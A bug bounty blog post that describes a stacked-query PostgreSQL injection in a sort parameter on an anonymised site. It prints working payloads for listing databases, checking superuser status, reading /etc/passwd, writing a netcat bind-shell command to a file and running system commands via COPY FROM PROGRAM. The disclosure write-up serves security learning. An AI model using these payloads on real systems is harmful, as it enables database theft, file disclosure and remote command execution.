Hello,This is me!

Abdul Wahab

A Security Engineer Bug Bounty Hunter Synack Red Team Member

Monday, 10 May 2021

PostgreSQL Injection to Remote Code Execution

 


Aslam-O-Alaikum fellas! in this noobish article, I will post about my recent finding, PostgreSQL Injection, allowing an attacker to access the database. Furthermore, can read/write internal files too.


PostgreSQL, also known as Postgres, is a free and open-source relational database management system emphasizing extensibility and SQL compliance. It was originally named POSTGRES, referring to its origins as a successor to the Ingres database developed at the University of California, Berkeley

So, the program is a private program I cannot disclose its name hence let's call it "private.com". The application "private.com" is calling some sort of datasets from the database using a GET request, which looks like this:

https://private.com/private/datasets/?context_details=%7B%22company%22:%22Context+1%22,%22brand%22:%22Brand+1%22%7D&sort_on=last_modified_date&sort_order=DESC&page_number=1&page_size=10&search_text=%22%22




Now, in the above URL, 'sort_on' and 'sort_order' parameters working as follow 

SELECT * FROM prod.dataset WHERE (isactive is true) AND context_id = 'private' ORDER BY dataset.last_modified_date DESC LIMIT 20 OFFSET 0
in the above SQL query values from 'sort_on' and 'sort_order'  parameters are getting inserted and are not validating the user input. Hence, an attacker can break the old SQL query and can add his own query( Stacked Query).

Like this,

https://private.com/private/datasets/?context_details=%7B%22company%22:%22Context+1%22,%22brand%22:%22Brand+1%22%7D&sort_on=last_modified_date&sort_order=DESC%3bSELECT+version()--%26&page_number=1&page_size=10&search_text=%22%22

The above URL insert our payload ";SELECT version()--&"in SQL query like this:

SELECT * FROM prod.dataset WHERE (isactive is true) AND context_id = 'private' ORDER BY dataset.last_modified_date DESC;SELECT version()--& LIMIT 20 OFFSET 0

and KaBOOM!



Now, to fetch all the Databases below payload can be used

;SELECT datname FROM pg_database--&



Remote Code Execution with PostgreSQL Injection

The following payload is used to confirm if we are superuser or not and Luckily I got Superuser = True :) 

;SELECT user;SHOW is_superuser; SELECT current_setting('is_superuser');SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;--&


Now, we can simple just read internal files like this:

;SELECT pg_read_file('/etc/passwd');--&/div>


To write a file following query can be used

;CREATE TABLE hw (t TEXT); INSERT INTO hw(t) VALUES('nc -lvvp 2346 -e /bin/bash'); SELECT * FROM hw; COPY hw(t) TO '/tmp/hw';

According to the Program rules, I am not allowed to make any changes to the server.

Below queries can be used to perform Remote Code Execution.
DROP TABLE IF EXISTS cmd_exec;          -- [Optional] Drop the table you want to use if it already exists
CREATE TABLE cmd_exec(cmd_output text); -- Create the table you want to hold the command output
COPY cmd_exec FROM PROGRAM 'id';        -- Run the system command via the COPY FROM PROGRAM function
SELECT * FROM cmd_exec;                 -- [Optional] View the results
DROP TABLE IF EXISTS cmd_exec;          -- [Optional] Remove the table


Thanks for reading.

./Logout

Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna Veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.

0 comments:

Post a Comment

SEND ME A MESSAGE

Search

Hi There, I am

Instagram

About Me

My photo
Turning my passion into my professional life. Love to break road and dig deeper as much as possible. Believe in no system is secure. Acknowledged by Google,Facebook,Paypal,Twitter and 250+ tech giants.

About Me

Social media

Flickr

Popular Posts